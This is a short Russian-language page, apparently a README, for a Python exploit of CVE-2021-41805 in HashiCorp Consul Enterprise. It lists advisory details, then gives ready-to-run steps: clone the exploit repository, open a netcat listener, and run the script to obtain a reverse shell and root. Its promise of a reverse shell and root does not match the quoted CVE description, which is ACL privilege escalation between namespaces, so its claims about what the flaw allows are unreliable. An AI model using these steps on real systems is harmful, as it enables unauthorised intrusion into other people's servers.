
HashiCorp Consul exploit with python. (CVE-2021-41805)
HashiCorp Consul Enterprise до версии 1.8.17, 1.9.x до 1.9.11 и 1.10.x до 1.10.4 имеет некорректный контроль доступа. Токен ACL (с разрешениями operator:write по умолчанию) в одном пространстве имен может быть использован для непреднамеренного повышения привилегий в другом пространстве имен.
CVE_ID : CVE-2021-41805
Базовая оценка : 8.8
Критичность : Высокая
Дата выпуска : 2021-12-12
Затронутые версии : HashiCorp Consul Enterprise до 1.8.17, 1.9.x до 1.9.11 и 1.10.x до 1.10.4
https://www.cvedetails.com/cve/CVE-2021-41805/
https://security.netapp.com/advisory/ntap-20211229-0007/
Получить обратную оболочку (reverse shell) и получить root-доступ.
git clone https://github.com/I-Am-Nelson/CVE-2021-41805.git
cd CVE-2021-41805
Затем запустите слушатель:
sudo nc -lvnp <port>
Затем запустите эксплойт:
python3 CVE-2021-41805.py